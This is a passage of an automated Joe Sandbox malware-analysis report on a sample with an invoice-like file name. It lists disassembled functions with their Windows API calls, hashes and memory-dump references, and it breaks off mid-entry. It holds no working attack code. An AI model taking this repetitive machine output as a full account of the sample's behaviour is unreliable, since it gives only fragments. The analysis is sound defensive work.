                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    • Opcode ID: dc63b60c6724e9c2355881d2a8dce07c9cb89d1dc289c5a234fd67998d84227b
                                    • Instruction ID: 320653d225eea9f183be0130d61f16f13ce2c5a7c7b5a8dc96bca817087c7a41
                                    • Opcode Fuzzy Hash: dc63b60c6724e9c2355881d2a8dce07c9cb89d1dc289c5a234fd67998d84227b
                                    • Instruction Fuzzy Hash: 3B21D671B05208EBDB14AB61CC86EEE3BA9EF49722F440064FE04DB281D6B49D49B791
                                    Function 00F012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                    • SelectObject.GDI32(?,00000000), ref: 00F0135C
                                    • BeginPath.GDI32(?), ref: 00F01373
                                    • SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 9b36ccb7a6de4ad2146d024dcd2c5cfc65f250293ff290a3c2900630ed58dd50
                                    • Instruction ID: 54ba155a62fa65ec7fa8d6a320b780282d4fbdd6fa4ad936ce7926fd12f7eaab
                                    • Opcode Fuzzy Hash: 9b36ccb7a6de4ad2146d024dcd2c5cfc65f250293ff290a3c2900630ed58dd50
                                    • Instruction Fuzzy Hash: 25211671804208EFDB119F25DE0ABAA7BA8BF00321F648226F811D71E0D7729995FB91
                                    Function 00F5C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: e2c8aded380581296322700c5910110bcf43e38803e561db99550beee8e733b5
                                    • Instruction ID: 62d7c9406704d7cf41dde32422c7eb45f0f651f5bedac881b3a72bff6f615d4a
                                    • Opcode Fuzzy Hash: e2c8aded380581296322700c5910110bcf43e38803e561db99550beee8e733b5
                                    • Instruction Fuzzy Hash: BB01F5B2A057153FE604A6209C46FAF7B9CAB213A5F044021FE0696283EB54DE15F2E5
                                    Function 00F64D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00F64D5C
                                    • __beginthreadex.LIBCMT ref: 00F64D7A
                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F64D8F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F64DA5
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F64DAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    • Opcode ID: dd2c097b72e9464ae98036249fc50075c6fd29d3542d83877a0fec7e78f1036f
                                    • Instruction ID: 40dee7127dd3dbdab401af2f5168041c762ae6cc364438a3c4f8f59798522bfb
                                    • Opcode Fuzzy Hash: dd2c097b72e9464ae98036249fc50075c6fd29d3542d83877a0fec7e78f1036f
                                    • Instruction Fuzzy Hash: 9B1104B2D0820CBFCB11EBA8DC08EEA7FACEB89320F144365F915D3250D6759D44A7A0
                                    Function 00F5874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                    • GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
                                    • Instruction ID: a3db47581010f956375d97564c286e384919f83afcbc2879fd72647561252348
                                    • Opcode Fuzzy Hash: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
                                    • Instruction Fuzzy Hash: 7D014F71600608EFDB104FA5EC88DA77B6DFF897A67200569F949D2160DA318C15EB60
                                    Function 00F654E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65502
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65510
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65518
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65522
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 2cdca8808d8b6eb632f1bb01a60c3dadae564c81d8066e86954d80465c63c1ce
                                    • Instruction ID: 0c1c021285042b335c1163cd7ff2b8ca5f743d9d6ca4e75ef8f2f9711a55efe9
                                    • Opcode Fuzzy Hash: 2cdca8808d8b6eb632f1bb01a60c3dadae564c81d8066e86954d80465c63c1ce
                                    • Instruction Fuzzy Hash: A1015B36C00A1DDBCF00DFE8E84D6EDBB78BB09B15F440496E902F2150DB309954E7A1
                                    Function 00F585F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F58608
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F58612
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F58621
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F58628
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F5863E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
                                    • Instruction ID: 683877722f09392e3d4eb413fd51de887d849a9e06a6c59c54e2998ff655c1af
                                    • Opcode Fuzzy Hash: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
                                    • Instruction Fuzzy Hash: DEF03C31201608AFEB100FA5DCCDEBB3BACEF897A5B100425FA45D7160DA619C4AEB60
                                    Function 00F58652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58669
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F58673
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58682
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F58689
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5869F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
                                    • Instruction ID: 50bfa34c93ae96b20c5027bdd59476b4c3b9101464c034ebff2f0027bc75092f
                                    • Opcode Fuzzy Hash: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
                                    • Instruction Fuzzy Hash: 96F04F71200308EFEB111FA5EC98EBB3BACEF897A5B140025FA45D6150DA619D49FB60
                                    Function 00F5C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C6BA
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F5C6D1
                                    • MessageBeep.USER32(00000000), ref: 00F5C6E9
                                    • KillTimer.USER32(?,0000040A), ref: 00F5C705
                                    • EndDialog.USER32(?,00000001), ref: 00F5C71F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 63e7cb1dc87e235eb947b56814172fdca612523ffe50372552ac681ca6676a75
                                    • Instruction ID: 04d043a461cabf4677b4dbec8cd1db25a43632693f8bb25dd4bb2cd98b65a48f
                                    • Opcode Fuzzy Hash: 63e7cb1dc87e235eb947b56814172fdca612523ffe50372552ac681ca6676a75
                                    • Instruction Fuzzy Hash: 250144309007089FEB215B20ED4EBA67778BB04706F000669B646E14E1EBE4695CAF90
                                    Function 00F013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 00F013BF
                                    • StrokeAndFillPath.GDI32(?,?,00F3BAD8,00000000,?), ref: 00F013DB
                                    • SelectObject.GDI32(?,00000000), ref: 00F013EE
                                    • DeleteObject.GDI32 ref: 00F01401
                                    • StrokePath.GDI32(?), ref: 00F0141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 3b5eb316a4396c3788c04ee8b905de8bcd8808b5e7606e10d7f8ede50e0a41b5
                                    • Instruction ID: 52ab474ab1b0746fe0a4b7dfd0b110e298f5fce9b823459180650175db0d09bb
                                    • Opcode Fuzzy Hash: 3b5eb316a4396c3788c04ee8b905de8bcd8808b5e7606e10d7f8ede50e0a41b5
                                    • Instruction Fuzzy Hash: 7AF0C93000860CEFDB119F26EE0DBA83BA5BF01326F148224E429860F1C7368999FF50
                                    Function 00F58E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F58E7F
                                    • CloseHandle.KERNEL32(?), ref: 00F58E94
                                    • CloseHandle.KERNEL32(?), ref: 00F58E9C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F58EA5
                                    • HeapFree.KERNEL32(00000000), ref: 00F58EAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 3751786701-0
                                    • Opcode ID: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
                                    • Instruction ID: 98210cbed9a9b1b395ac69c2c48f6ba8d0334c326caaf5aef884e3bff8000aa1
                                    • Opcode Fuzzy Hash: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
                                    • Instruction Fuzzy Hash: C6E05276104509FFDA011FE5EC0C9AABB69FB89762B508631F219C1474CB329469EB50
                                    Function 00F12E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F07BB1: _memmove.LIBCMT ref: 00F07C0B
                                    • __swprintf.LIBCMT ref: 00F1302D
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F12EC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: 0ca11a13035a88538cd81e5ea151fb5dcd22c3c607880d66c98f05fb5f8f43e8
                                    • Instruction ID: d4246e1692b44636ea060f699d8b79ca3cc19c367a899a33d2dcab7956323164
                                    • Opcode Fuzzy Hash: 0ca11a13035a88538cd81e5ea151fb5dcd22c3c607880d66c98f05fb5f8f43e8
                                    • Instruction Fuzzy Hash: 13916D715083019FC718EF24DC85CAEB7E4EF99760F00495DF8819B2A1EB64EE48EB52
                                    Function 00F2524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00F252DD
                                      • Part of subcall function 00F30340: __87except.LIBCMT ref: 00F3037B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 1e5d661d4f07136f90cce7f1cb4d73c288be9dfb769011b420befa1e52abaf39
                                    • Instruction ID: 4d0d3e8af5716c673cf7478d163a3e44fed85f9c19385661fac67390fc2481ac
                                    • Opcode Fuzzy Hash: 1e5d661d4f07136f90cce7f1cb4d73c288be9dfb769011b420befa1e52abaf39
                                    • Instruction Fuzzy Hash: 98517862E1D705D7CB10F724ED6137E3B949B00B70F20895AE485862EAEF78CDD4BA46
                                    Function 00F2023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$+
                                    • API String ID: 0-2552117581
                                    • Opcode ID: cbbc7f8350987432b8e718748d8e4138b87decfa142d00d80251cd827319fabc
                                    • Instruction ID: d0f34b9b89128c24972bd83793e43f4a7de09b36cfa870fc665ba2b49333be52
                                    • Opcode Fuzzy Hash: cbbc7f8350987432b8e718748d8e4138b87decfa142d00d80251cd827319fabc
                                    • Instruction Fuzzy Hash: CE515373908215CFCF14DF28D8986FA7BB0EF5A720F140051ED809B2A1DB389C4AEB60
                                    Function 00F162F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
